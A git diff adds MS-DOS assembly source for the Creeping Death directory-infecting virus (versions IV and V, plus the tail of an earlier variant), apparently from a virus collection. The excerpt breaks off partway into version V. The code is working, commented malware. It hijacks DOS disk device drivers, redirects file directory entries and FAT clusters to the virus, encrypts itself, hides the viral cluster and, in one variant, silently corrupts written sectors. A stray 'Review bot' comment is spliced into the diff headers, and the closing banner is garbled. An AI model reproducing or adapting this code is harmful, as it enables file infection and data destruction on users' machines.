partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: inc byte ptr cs:Random ; increase counter + jnz Skip ; zero ? 
+ push bx ; yes, change one byte in the + push ds ; sector to write + lds bx,ds:[bx+16h] + inc bh + inc byte ptr ds:[bx] ; destroy some data + pop ds + pop bx +Skip: mov cx,0ff09h + call Check ; check if disk changed + jz Disk ; yes, write virus to disk + jmp InfectSector ; no, just infect sector +Disk: call DoRequest + jmp short InfectDisk + +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jnz InfectDisk ; no, read sector + jmp Read +InfectDisk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +Save: lodsw + push ax + loop Save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz More ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +More: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? 
+ sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector + lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok + not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax ; allocate 1st cluster + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz Here + inc dx + mul dx +Here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] ; allocate last cluster + and ax,di + mov dx,di + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je DiskInfected ; yes, don't write it and go on + mov dx,ds:[si] + mov byte ptr es:[bx+2],8 ; write the adjusted sector to + call DoRequest ; disk + jnz DiskInfected + mov byte ptr es:[bx+2],4 ; read it again + call ReadSector + cmp ds:[si],dx ; is it written correctly ? 
+ jne DiskInfected ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz Less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +Less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +DiskInfected: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +Load: pop ax + stosw + loop Load +Read: call DoRequest ; do request + + mov cx,9 +InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +Find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +Com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +Found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +Pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? 
+ je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +Gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +Rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +Go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +Check: mov ah,ds:[bx+1] ; get number of unit +Drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne Changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +Changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr es:[bx+4],80h ; error ? 
yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae Fat16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc Continue + mov di,0fff0h + jmp short Continue +Fat16: mov si,2 + mul si + mov di,0ffffh +Continue: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds ; write virus to disk + push cs ; (encrypted) save regs + pop ds + push es + push cs + pop es + cld ; copy forward + mov cx,12 ; length of encryptor + mov si,offset Encrypt ; start of encryptor + mov di,offset EncryptWrite2 ; destenation + inc byte ptr ds:[si+8] ; change xor value + rep movsb ; copy encryptor + mov cl,10 ; copy dorequest proc + mov si,offset DoRequest + rep movsb + mov cl,12 ; copy encryptor + mov si,offset Encrypt + rep movsb + mov ax,0c31fh ; store "pop ds","ret" + stosw ; instructions + pop es ; restore register + jmp EncryptWrite2 ; encrypt and write vir + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +File db "C:",255,0 ; the virus tries to open this + ; file + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Random db ? ; if this byte becomes zero + ; the virus will change the + ; sector that will be written + ; to disk + +Header db 7 dup(?) ; this is the header for the + ; device driver + +Filename db ? 
; Buffer for the filename used + ; by the exec-function + + +;*****************************************************************************; +; ; +; The End ; +; ; +;*****************************************************************************; + +code ends ; end of the viral code + +end Encrypt ; start at offset 100h for + ; com-file + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cdeath4.asm b/MSDOS/Virus.MSDOS.Unknown.cdeath4.asm new file mode 100644 index 00000000..8d832a9e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdeath4.asm 
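Review bot: The trailer banner at the end of this file has been committed with its original (apparently CP437 box-drawing) characters mis-transcoded into runs of `哪`, so the last four comment lines are unreadable and no longer round-trip to the source listing; the file should be re-imported with the correct source codepage, or the banner deliberately rendered in UTF-8. The header comment also describes only the encryption and stealth, while `Output:` increments `cs:Random` and, each time that byte wraps to zero, executes `inc byte ptr ds:[bx]` on the sector about to be written (the author's own comment is `destroy some data`); that silent one-byte corruption of roughly every 256th written sector is the symptom an incident responder will actually observe, so it belongs in the header next to the infection mechanism. A one-line addition such as `; Payload: corrupts one byte of every 256th sector written (see Output)` would cover it. `Random db ?` is never initialised, so the first corrupting write lands at an unpredictable point after infection, which is worth stating as well.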
@@ -0,0 +1,602 @@ +;*****************************************************************************; +; ; +; Creeping Death IV (Encrypting, try to find it) ; +; ; +; (c) Copyright 1992 by Bit Addict ; +; ; +;*****************************************************************************; + +code segment public 'code' + assume cs:code, ds:code, es:code + org 100h + +;*****************************************************************************; +; ; +; Actual start of virus. In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov bx,offset Main-9 +Repeat: xor byte ptr [bx+8],bl + inc bx + jnz Repeat + +Main: mov sp,600h ; init stack + inc Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,?? 
+ +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? + jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? 
+ je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Install: int 20h + +;*****************************************************************************; +; ; +; An file is opend with this name, but the file will not be found. ; +; ; +;*****************************************************************************; + +File: db "C:",255,0 + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. 
; +; ; +;*****************************************************************************; + +Last: jcxz install + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header + movsw + lodsw + mov es:StrBlock,ax + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. ; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; =0 ? 
+ jz Boot
+ mov es,bx
+ mov ah,49h ; deallocate memory
+ int 21h
+ xor ax,ax
+ mov di,1
+Seek: dec di ; scan for end of environment
+ scasw
+ jne Seek
+ lea si,ds:[di+2] ; es:si = start of filename
+ jmp short Exec
+
+Boot: mov ds,ds:[16h] ; es = parent PSP
+ mov bx,ds:[16h] ; bx = parent PSP of Parent PSP
+ xor si,si
+ sub bx,1
+ jnb Exec
+ mov ax,cs
+ dec ax
+ mov ds,ax
+ mov cx,8
+ mov si,8
+ mov di,0ffh
+Count: lodsb
+ or al,al
+ loopne Count
+ not cx
+ and cx,7
+NextByte: mov si,8
+ inc di
+ push di
+ push cx
+ rep cmpsb
+ pop cx
+ pop di
+ jne NextByte
+BeginName: dec di
+ cmp byte ptr es:[di-1],0
+ jne BeginName
+ mov si,di
+ mov bx,es
+Exec: push bx
+ push cs
+ pop ds
+ mov bx,offset Param
+ mov ds:[bx+4],cs ; set segments in EPB
+ mov ds:[bx+8],cs
+ mov ds:[bx+12],cs
+ pop ds
+ push cs
+ pop es
+
+ mov di,offset f_name ; copy name of this file
+ push di
+ mov cx,40
+ rep movsw
+ push cs
+ pop ds
+
+ mov ah,3dh ; open file, this file will
+ mov dx,offset File ; not be found but the entire
+ int 21h ; directory is searched and
+ pop dx ; infected
+
+ mov ax,4b00h ; execute file
+ int 21h
+ mov ah,4dh ; get exit-code
+ int 21h
+ mov ah,4ch ; terminate (al = exit code)
+ int 21h
+
+;*****************************************************************************;
+; ;
+; Installation complete ;
+; ;
+;*****************************************************************************;
+; ;
+; The next part contains the device driver used by creeping death to infect ;
+; directory's ;
+; ;
+; The device driver uses only the strategy routine to handle the requests. ;
+; I don't know if this is because the virus will work better or the writer ;
+; of this virus didn't know how to do it right. ;
+; ;
+;*****************************************************************************;
+
+
+Strategy: mov cs:RequestOffset,bx
+ mov cs:RequestSegment,es
+ retf
+
+Interrupt: push ax ; driver strategy block
+ push bx
+ push cx ; save registers
+ push dx
+ push si
+ push di
+ push ds
+ push es
+
+ les bx,cs:Request
+ push es
+ pop ds
+ mov al,ds:[bx+2] ; Command Code
+
+ cmp al,4 ; Input
+ je Input
+ cmp al,8 ; Output
+ je Output
+ cmp al,9
+ je Output
+
+ call DoRequest
+
+ cmp al,2 ; Build BPB
+ jne Return
+ lds si,ds:[bx+12h] ; copy the BPB and change it
+ mov di,offset bpb_buf ; into one that hides the virus
+ mov es:[bx+12h],di
+ mov es:[bx+14h],cs
+ push es ; copy
+ push cs
+ pop es
+ mov cx,16
+ rep movsw
+ pop es
+ push cs
+ pop ds
+ mov al,ds:[di+2-32] ; change
+ cmp al,2
+ adc al,0
+ cbw
+ cmp word ptr ds:[di+8-32],0 ; >32mb partition ?
+ je m32 ; yes, jump to m32
+ sub ds:[di+8-32],ax ; <32mb partition
+ jmp short Return
+m32: sub ds:[di+15h-32],ax ; >32mb partition
+ sbb word ptr ds:[di+17h-32],0
+Return: pop es ; return to caller
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ retf
+
+Output: mov cx,0ff09h ; check if disk changed
+ call check
+ jz InfectSector ; no, just infect sector
+ call DoRequest ; yes, write virus to disk
+ jmp short inf_dsk
+
+InfectSector: jmp _InfectSector ; infect sector
+Read: jmp _Read ; read sector
+ReadError: add sp,16 ; error during request
+ jmp short Return
+
+Input: call check ; check if disk changed
+ jz Read ; no, read sector
+inf_dsk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk
+ cld ; save last part of request
+ lea si,ds:[bx+0eh]
+ mov cx,8
+save: lodsw
+ push ax
+ loop save
+ mov word ptr ds:[bx+14h],1 ; read 1st sector on disk
+ call ReadSector
+ jnz ReadError
+ mov byte ptr ds:[bx+2],2 ; build BPB
+ call DoRequest
+ lds si,ds:[bx+12h] ; ds:si = BPB
+ mov di,ds:[si+6] ; size of root directory
+ add di,15 ; in sectors
+ mov cl,4
+ shr di,cl
+ mov al,ds:[si+5]
+ cbw
+ mov dx,ds:[si+0bh]
+ mul dx ; ax=fat sectors, dx=0
+ add ax,ds:[si+3]
+ add di,ax
+ push di ; save it on stack
+ mov ax,ds:[si+8] ; total number of sectors
+ cmp ax,dx ; >32mb
+ jnz more ; no, skip next 2 instructions
+ mov ax,ds:[si+15h] ; get number of sectors
+ mov dx,ds:[si+17h]
+more: xor cx,cx ; cx=0
+ sub ax,di ; dx:ax=number is data sectors
+ sbb dx,cx
+ mov cl,ds:[si+2] ; cx=sectors / cluster
+ div cx ; number of clusters on disk
+ cmp cl,2 ; 1 sector/cluster ?
+ sbb ax,-1 ; number of clusters (+1 or +2)
+ push ax ; save it on stack
+ call Convert ; get fat sector and offset in
+ mov byte ptr es:[bx+2],4 ; sector
+ mov es:[bx+14h],ax
+ call ReadSector ; read fat sector
+again: lds si,es:[bx+0eh]
+ add si,dx
+ sub dh,cl ; has something to do with the
+ adc dx,ax ; encryption of the pointers
+ mov word ptr cs:[gad+1],dx
+ cmp cl,1 ; 1 sector / cluster
+ jne Ok
+SmallModel: not di ; this is used when the
+ and ds:[si],di ; clusters are 1 sector long
+ pop ax
+ push ax
+ inc ax
+ push ax
+ mov dx,0fh
+ test di,dx
+ jz here
+ inc dx
+ mul dx
+here: or ds:[si],ax
+ pop ax
+ call Convert
+ mov si,es:[bx+0eh]
+ add si,dx
+Ok: mov ax,ds:[si]
+ and ax,di
+ mov dx,di ; allocate cluster
+ dec dx
+ and dx,di
+ not di
+ and ds:[si],di
+ or ds:[si],dx
+ cmp ax,dx ; cluster already allocated by
+ pop ax ; the virus ?
+ pop di
+ mov word ptr cs:[pointer+1],ax
+ je _Read_ ; yes, don't write it and go on
+ mov dx,ds:[si]
+ push ds
+ push si
+ mov byte ptr es:[bx+2],8 ; write
+ call DoRequest ; write the adjusted sector to
+ pop si ; disk
+ pop ds
+ jnz _Read_
+ call ReadSector ; read it again
+ cmp ds:[si],dx ; is it written correctly ?
+ jne _Read_ ; no, can't infect disk
+ dec ax
+ dec ax ; calculate the sector number
+ mul cx ; to write the virus to
+ add ax,di
+ adc dx,0
+ push es
+ pop ds
+ mov word ptr ds:[bx+12h],2
+ mov ds:[bx+14h],ax ; store it in the request hdr
+ test dx,dx
+ jz less
+ mov word ptr ds:[bx+14h],-1
+ mov ds:[bx+1ah],ax
+ mov ds:[bx+1ch],dx
+less: mov ds:[bx+10h],cs
+ mov ds:[bx+0eh],100h
+ mov byte ptr es:[bx+2],8 ; write it
+ call EncryptWrite1
+
+_Read_: mov byte ptr ds:[bx+2],4 ; restore this byte
+ std ; restore other part of the
+ lea di,ds:[bx+1ch] ; request
+ mov cx,8
+load: pop ax
+ stosw
+ loop load
+_Read: call DoRequest ; do request
+
+ mov cx,9
+_InfectSector: mov di,es:[bx+12h] ; get number of sectors read
+ lds si,es:[bx+0eh] ; get address of data
+ sal di,cl ; calculate end of buffer
+ xor cl,cl
+ add di,si
+ xor dl,dl
+ push ds ; infect the sector
+ push si
+ call find
+ jcxz no_inf ; write sector ?
+ mov al,8
+ xchg al,es:[bx+2] ; save command byte
+ call DoRequest ; write sector
+ mov es:[bx+2],al ; restore command byte
+ and byte ptr es:[bx+4],07fh
+no_inf: pop si
+ pop ds
+ inc dx ; disinfect sector in memory
+ call find
+ jmp Return ; return to caller
+
+;*****************************************************************************;
+; ;
+; Subroutines ;
+; ;
+;*****************************************************************************;
+
+find: mov ax,ds:[si+8] ; (dis)infect sector in memory
+ cmp ax,"XE" ; check for .exe
+ jne com
+ cmp ds:[si+10],al
+ je found
+com: cmp ax,"OC" ; check for .com
+ jne go_on
+ cmp byte ptr ds:[si+10],"M"
+ jne go_on
+found: test word ptr ds:[si+1eh],0ffc0h ; file to big
+ jnz go_on ; more than 4mb
+ test word ptr ds:[si+1dh],03ff8h ; file to small
+ jz go_on ; less than 2048 bytes
+ test byte ptr ds:[si+0bh],1ch ; directory, system or
+ jnz go_on ; volume label
+ test dl,dl ; infect or disinfect ?
+ jnz rest
+pointer: mov ax,1234h ; ax = viral cluster
+ cmp ax,ds:[si+1ah] ; file already infected ?
+ je go_on ; yes, go on
+ xchg ax,ds:[si+1ah] ; exchange pointers
+gad: xor ax,1234h ; encryption
+ mov ds:[si+14h],ax ; store it on another place
+ loop go_on ; change cx and go on
+rest: xor ax,ax ; ax = 0
+ xchg ax,ds:[si+14h] ; get pointer
+ xor ax,word ptr cs:[gad+1] ; Encrypt
+ mov ds:[si+1ah],ax ; store it on the right place
+go_on: rol word ptr cs:[gad+1],1 ; change encryption
+ add si,32 ; next directory entry
+ cmp di,si ; end of buffer ?
+ jne find ; no, do it again
+ ret ; return
+
+check: mov ah,ds:[bx+1] ; get number of unit
+drive: cmp ah,-1 ; same as last call ?
+ mov byte ptr cs:[drive+2],ah ; set 2nd parameter
+ jne changed
+ push ds:[bx+0eh] ; save word
+ mov byte ptr ds:[bx+2],1 ; disk changed ?
+ call DoRequest
+ cmp byte ptr ds:[bx+0eh],1 ; 1=Yes
+ pop ds:[bx+0eh] ; restore word
+ mov ds:[bx+2],al ; restore command
+changed: ret ; return
+
+ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk
+
+DoRequest: db 09ah ; call 70:?, orginal strategy
+StrBlock dw ?,70h
+ db 09ah ; call 70:?, orginal interrupt
+IntBlock dw ?,70h
+ test byte ptr es:[bx+4],80h ; error ? yes, zf = 0
+ ret ; return
+
+Convert: cmp ax,0ff0h ; convert cluster number into
+ jae fat_16 ; an sector number and offset
+ mov si,3 ; into this sector containing
+ xor word ptr cs:[si+gad-1],si ; the fat-item of this
+ mul si ; cluster
+ shr ax,1
+ mov di,0fffh
+ jnc cont
+ mov di,0fff0h
+ jmp short cont
+fat_16: mov si,2
+ mul si
+ mov di,0ffffh
+cont: mov si,512
+ div si
+ inc ax
+ ret
+
+EncryptWrite1: push ds
+ push cs
+ pop ds
+ push es
+ push cs
+ pop es
+ cld
+ mov cx,9
+ mov si,offset Encrypt
+ mov di,offset EncryptWrite2
+ mov al,ds:[si+5]
+ add al,11
+ mov ds:[si+5],al
+ cbw
+ mov dx,offset Main-1
+ sub dx,ax
+ mov ds:[si+1],dx
+ rep movsb
+ mov cl,10
+ mov si,offset DoRequest
+ rep movsb
+ mov cl,9
+ mov si,offset Encrypt
+ rep movsb
+ mov ax,0c31fh
+ stosw
+ pop es
+ jmp EncryptWrite2
+
+Counter dw 0 ; this will count the number of
+ ; systems that are infected by
+ ; this virus
+
+Param: dw 0,80h,?,5ch,?,6ch,? ; parameters for the
+ ; exec-function
+
+Header db 7 dup(?) ; this is the header for the
+ ; device driver
+
+Request equ this dword ; address of the request header
+RequestOffset dw ?
+RequestSegment dw ?
+
+bpb_buf: db 32 dup(?) ; buffer for BPB
+EncryptWrite2: db 30 dup(?)
+f_name: db 80 dup(?) ; Buffer for the filename used
+ ; by the exec-function
+
+
+
+;*****************************************************************************;
+; ;
+; The End ;
+; ;
+;*****************************************************************************;
+
+code ends
+
+end Encrypt
diff --git a/MSDOS/Virus.MSDOS.Unknown.cdeath5.asm b/MSDOS/Virus.MSDOS.Unknown.cdeath5.asm
new file mode 100644
index 00000000..c43bb23f
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cdeath5.asm
@@ -0,0 +1,605 @@
+;*****************************************************************************;
+; ;
+; Creeping Death V (Encrypting, try to find it) ;
+; (Version 4 bug Fixed) :
+; (c) Copyright 1992 by Bit Addict ;
+; ;
+;*****************************************************************************;
+
+code segment public 'code'
+ assume cs:code, ds:code, es:code
+ org 5ch
+
+;*****************************************************************************;
+; ;
+; Data ;
+; ;
+;*****************************************************************************;
+
+BPB_Buf: db 32 dup(?) ; buffer for BPB
+EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt
+
+Request equ this dword ; address of the request header
+RequestOffset dw ?
+RequestSegment dw ?
+
+ org 100h
+
+;*****************************************************************************;
+; ;
+; Actual start of virus. In this part the virus initializes the stack and ;
+; adjusts the device driver used by dos to read and write from floppy's and ;
+; hard disks. Then it will start the orginal exe or com-file ;
+; ;
+;*****************************************************************************;
+
+Encrypt: mov si,offset Main-1
+ mov cx,400h-11
+Repeat: xor byte ptr [si],0
+ inc si
+ loop Repeat
+
+Main: mov sp,600h ; init stack
+ inc Counter
+
+;*****************************************************************************;
+; ;
+; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ;
+; si will be -1 ;
+; ;
+;*****************************************************************************;
+
+DosVersion: mov ah,30h ; fn 30h = Get Dosversion
+ int 21h ; int 21h
+ cmp al,4 ; major dosversion
+ sbb di,di
+ mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,??
+
+;*****************************************************************************;
+; ;
+; Adjust the size of the codesegment, with dos function 4ah ;
+; ;
+;*****************************************************************************;
+
+ mov bx,60h ; Adjust size of memory block
+ mov ah,4ah ; to 60 paragraphs = 600h bytes
+ int 21h ; int 21h
+
+ mov ah,52h ; get internal list of lists
+ int 21h ; int 21h
+
+;*****************************************************************************;
+; ;
+; If the virus code segment is located behind the dos config memory block the ;
+; code segment will be part of the config memory block making it 61h ;
+; paragraphs larger. If the virus is not located next to the config memory ;
+; block the virus will set the owner to 8h (Dos system) ;
+; ;
+;*****************************************************************************;
+
+ mov ax,es:[bx-2] ; segment of first MCB
+ mov dx,cs ; dx = MCB of the code segment
+ dec dx
+NextMCB: mov ds,ax ; ax = segment next MCB
+ add ax,ds:[3]
+ inc ax
+ cmp ax,dx ; are they equal ?
+ jne NextMCB ; no, not 1st program executed
+ cmp word ptr ds:[1],8
+ jne NoBoot
+ add word ptr ds:[3],61h ; add 61h to size of block
+NoBoot: mov ds,dx ; ds = segment of MCB
+ mov word ptr ds:[1],8 ; owner = dos system
+
+;*****************************************************************************;
+; ;
+; The virus will search for the disk paramenter block for drive a: - c: in ;
+; order to find the device driver for these block devices. If any of these ;
+; blocks is found the virus will install its own device driver and set the ;
+; access flag to -1 to tell dos this device hasn't been accesed yet. ;
+; ;
+;*****************************************************************************;
+
+ cld ; clear direction flag
+ lds bx,es:[bx] ; get pointer to first drive
+ ; paramenter block
+
+Search: cmp bx,-1 ; last block ?
+ je Last
+ mov ax,ds:[bx+di+15h] ; get segment of device header
+ cmp ax,70h ; dos device header ??
+ jne Next ; no, go to next device
+ xchg ax,cx
+ mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive
+ ; has not been accessed"
+ mov si,offset Header-4 ; set address of new device
+ xchg si,ds:[bx+di+13h] ; and save old address
+ mov ds:[bx+di+15h],cs
+Next: lds bx,ds:[bx+di+19h] ; next drive parameter block
+ jmp Search
+
+;*****************************************************************************;
+; ;
+; If the virus has failed in starting the orginal exe-file it will jump here. ;
+; ;
+;*****************************************************************************;
+
+Boot: mov ds,ds:[16h] ; es = parent PSP
+ mov bx,ds:[16h] ; bx = parent PSP of Parent PSP
+ xor si,si
+ sub bx,1
+ jnb Exec
+ mov ax,cs
+ dec ax
+ mov ds,ax
+ mov cx,8
+ mov si,8
+ mov di,0ffh
+Count: lodsb
+ or al,al
+ loopne Count
+ not cx
+ and cx,7
+NextByte: mov si,8
+ inc di
+ push di
+ push cx
+ rep cmpsb
+ pop cx
+ pop di
+ jne NextByte
+BeginName: dec di
+ cmp byte ptr es:[di-1],0
+ jne BeginName
+ mov si,di
+ mov bx,es
+ jmp short Exec
+
+;*****************************************************************************;
+; ;
+; If none of these devices is found it means the virus is already resident ;
+; and the virus wasn't able to start the orginal exe-file (the file is ;
+; corrupted by copying it without the virus memory resident). If the device ;
+; is found the information in the header is copied. ;
+; ;
+;*****************************************************************************;
+
+Last: jcxz Exit
+
+;*****************************************************************************;
+; ;
+; The information about the dos device driver is copyed to the virus code ;
+; segment ;
+; ;
+;*****************************************************************************;
+
+ mov ds,cx ; ds = segment of Device Driver
+ add si,4
+ push cs
+ pop es
+ mov di,offset Header
+ movsw
+ lodsw
+ mov es:StrBlock,ax
+ mov ax,offset Strategy
+ stosw
+ lodsw
+ mov es:IntBlock,ax
+ mov ax,offset Interrupt
+ stosw
+ movsb
+
+;*****************************************************************************;
+; ;
+; Deallocate the environment memory block and start the this file again, but ;
+; if the virus succeeds it will start the orginal exe-file. ;
+; ;
+;*****************************************************************************;
+
+ push cs
+ pop ds
+ mov bx,ds:[2ch] ; environment segment
+ or bx,bx ; =0 ?
+ jz Boot
+ mov es,bx
+ mov ah,49h ; deallocate memory
+ int 21h
+ xor ax,ax
+ mov di,1
+Seek: dec di ; scan for end of environment
+ scasw
+ jne Seek
+ lea si,ds:[di+2] ; es:si = start of filename
+Exec: push bx
+ push cs
+ pop ds
+ mov bx,offset Param
+ mov ds:[bx+4],cs ; set segments in EPB
+ mov ds:[bx+8],cs
